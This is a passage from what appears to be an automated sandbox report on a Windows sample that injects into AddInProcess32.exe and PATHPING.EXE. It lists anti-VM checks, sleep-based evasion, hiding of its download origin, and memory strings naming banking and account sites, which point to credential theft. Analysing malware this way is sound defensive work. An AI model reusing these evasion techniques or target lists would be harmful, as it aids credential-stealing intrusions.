              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004016B7 push edx; ret 4_2_004016F4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0041DEB8 push ds; iretd 4_2_0041DEC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC09AD push ecx; mov dword ptr [esp], ecx4_2_01AC09B6
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BD09AD push ecx; mov dword ptr [esp], ecx7_2_02BD09B6
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004203CA pushad ; ret 7_2_004203E0
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00420533 push es; iretd 7_2_00420539
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0041A815 push ds; iretd 7_2_0041A81F
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040A96B pushfd ; retf 7_2_0040A96D
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00428AF0 push es; retf E8E4h7_2_00428C10
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00412B80 pushad ; retf DE68h7_2_00412BDB
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00404D77 push ebp; iretd 7_2_00404D7E
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00406EC0 push 0000002Eh; retf 7_2_00406EEB
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00406EB9 push 0000002Eh; retf 7_2_00406EEB
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00415130 push edx; retn CB1Fh7_2_00415299
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040DB0D push ebp; iretd 7_2_0040DB16
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00401C0B push ebx; retf 7_2_00401C0D
              Source: rFV23+17555.exeStatic PE information: section name: .text entropy: 7.2118981198836964

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\rFV23+17555.exeFile opened: C:\Users\user\Desktop\rFV23+17555.exe\:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: rFV23+17555.exe PID: 516, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: 4850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: 81D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: 91D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: A770000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: B770000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeMemory allocated: C770000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0096E rdtsc 4_2_01B0096E
              Source: C:\Users\user\Desktop\rFV23+17555.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeWindow / User API: threadDelayed 8225Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeWindow / User API: threadDelayed 1637Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\PATHPING.EXEAPI coverage: 2.6 %
              Source: C:\Users\user\Desktop\rFV23+17555.exe TID: 1772Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exe TID: 1772Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0041B790 FindFirstFileW,FindNextFileW,FindClose,7_2_0041B790
              Source: C:\Users\user\Desktop\rFV23+17555.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\rFV23+17555.exeThread delayed: delay time: 30000Jump to behavior
              Source: -0o5F4M6.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: rFV23+17555.exe, 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmp, rFV23+17555.exe, 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
              Source: rFV23+17555.exe, 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
              Source: -0o5F4M6.7.drBinary or memory string: discord.comVMware20,11696428655f
              Source: -0o5F4M6.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: global block list test formVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: -0o5F4M6.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: -0o5F4M6.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: -0o5F4M6.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: -0o5F4M6.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: -0o5F4M6.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: rFV23+17555.exe, 00000000.00000002.2735199295.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294555263.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3238524190.000001AF297EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: -0o5F4M6.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: -0o5F4M6.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: -0o5F4M6.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: -0o5F4M6.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: -0o5F4M6.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: -0o5F4M6.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: -0o5F4M6.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: -0o5F4M6.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: -0o5F4M6.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: -0o5F4M6.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\rFV23+17555.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\PATHPING.EXEProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B0096E rdtsc 4_2_01B0096E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00417433 LdrLoadDll,4_2_00417433
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]4_2_01B4019F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]4_2_01B4019F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]4_2_01B4019F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B4019F mov eax, dword ptr fs:[00000030h]4_2_01B4019F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B00185 mov eax, dword ptr fs:[00000030h]4_2_01B00185
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B64180 mov eax, dword ptr fs:[00000030h]4_2_01B64180
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B64180 mov eax, dword ptr fs:[00000030h]4_2_01B64180
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABA197 mov eax, dword ptr fs:[00000030h]4_2_01ABA197
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABA197 mov eax, dword ptr fs:[00000030h]4_2_01ABA197
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABA197 mov eax, dword ptr fs:[00000030h]4_2_01ABA197
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B7C188 mov eax, dword ptr fs:[00000030h]4_2_01B7C188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B7C188 mov eax, dword ptr fs:[00000030h]4_2_01B7C188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF01F8 mov eax, dword ptr fs:[00000030h]4_2_01AF01F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B961E5 mov eax, dword ptr fs:[00000030h]4_2_01B961E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]4_2_01B3E1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]4_2_01B3E1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E1D0 mov ecx, dword ptr fs:[00000030h]4_2_01B3E1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]4_2_01B3E1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B3E1D0 mov eax, dword ptr fs:[00000030h]4_2_01B3E1D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B861C3 mov eax, dword ptr fs:[00000030h]4_2_01B861C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B861C3 mov eax, dword ptr fs:[00000030h]4_2_01B861C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AF0124 mov eax, dword ptr fs:[00000030h]4_2_01AF0124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B80115 mov eax, dword ptr fs:[00000030h]4_2_01B80115
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6A118 mov ecx, dword ptr fs:[00000030h]4_2_01B6A118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6A118 mov eax, dword ptr fs:[00000030h]4_2_01B6A118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6A118 mov eax, dword ptr fs:[00000030h]4_2_01B6A118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6A118 mov eax, dword ptr fs:[00000030h]4_2_01B6A118
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]4_2_01B6E10E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B58158 mov eax, dword ptr fs:[00000030h]4_2_01B58158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]4_2_01B54144
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]4_2_01B54144
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B54144 mov ecx, dword ptr fs:[00000030h]4_2_01B54144
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]4_2_01B54144
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]4_2_01B54144
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6154 mov eax, dword ptr fs:[00000030h]4_2_01AC6154
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC6154 mov eax, dword ptr fs:[00000030h]4_2_01AC6154
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABC156 mov eax, dword ptr fs:[00000030h]4_2_01ABC156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B860B8 mov eax, dword ptr fs:[00000030h]4_2_01B860B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B860B8 mov ecx, dword ptr fs:[00000030h]4_2_01B860B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B580A8 mov eax, dword ptr fs:[00000030h]4_2_01B580A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC208A mov eax, dword ptr fs:[00000030h]4_2_01AC208A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B020F0 mov ecx, dword ptr fs:[00000030h]4_2_01B020F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC80E9 mov eax, dword ptr fs:[00000030h]4_2_01AC80E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABA0E3 mov ecx, dword ptr fs:[00000030h]4_2_01ABA0E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B460E0 mov eax, dword ptr fs:[00000030h]4_2_01B460E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABC0F0 mov eax, dword ptr fs:[00000030h]4_2_01ABC0F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B420DE mov eax, dword ptr fs:[00000030h]4_2_01B420DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B56030 mov eax, dword ptr fs:[00000030h]4_2_01B56030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABA020 mov eax, dword ptr fs:[00000030h]4_2_01ABA020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABC020 mov eax, dword ptr fs:[00000030h]4_2_01ABC020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B44000 mov ecx, dword ptr fs:[00000030h]4_2_01B44000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]4_2_01B62000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]4_2_01ADE016
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]4_2_01ADE016
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]4_2_01ADE016
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]4_2_01ADE016
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AEC073 mov eax, dword ptr fs:[00000030h]4_2_01AEC073
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01B46050 mov eax, dword ptr fs:[00000030h]4_2_01B46050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AC2050 mov eax, dword ptr fs:[00000030h]4_2_01AC2050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE438F mov eax, dword ptr fs:[00000030h]4_2_01AE438F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AE438F mov eax, dword ptr fs:[00000030h]4_2_01AE438F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABE388 mov eax, dword ptr fs:[00000030h]4_2_01ABE388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABE388 mov eax, dword ptr fs:[00000030h]4_2_01ABE388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01ABE388 mov eax, dword ptr fs:[00000030h]4_2_01ABE388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB8397 mov eax, dword ptr fs:[00000030h]4_2_01AB8397
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB8397 mov eax, dword ptr fs:[00000030h]4_2_01AB8397
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AB8397 mov eax, dword ptr fs:[00000030h]4_2_01AB8397
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]4_2_01AD03E9
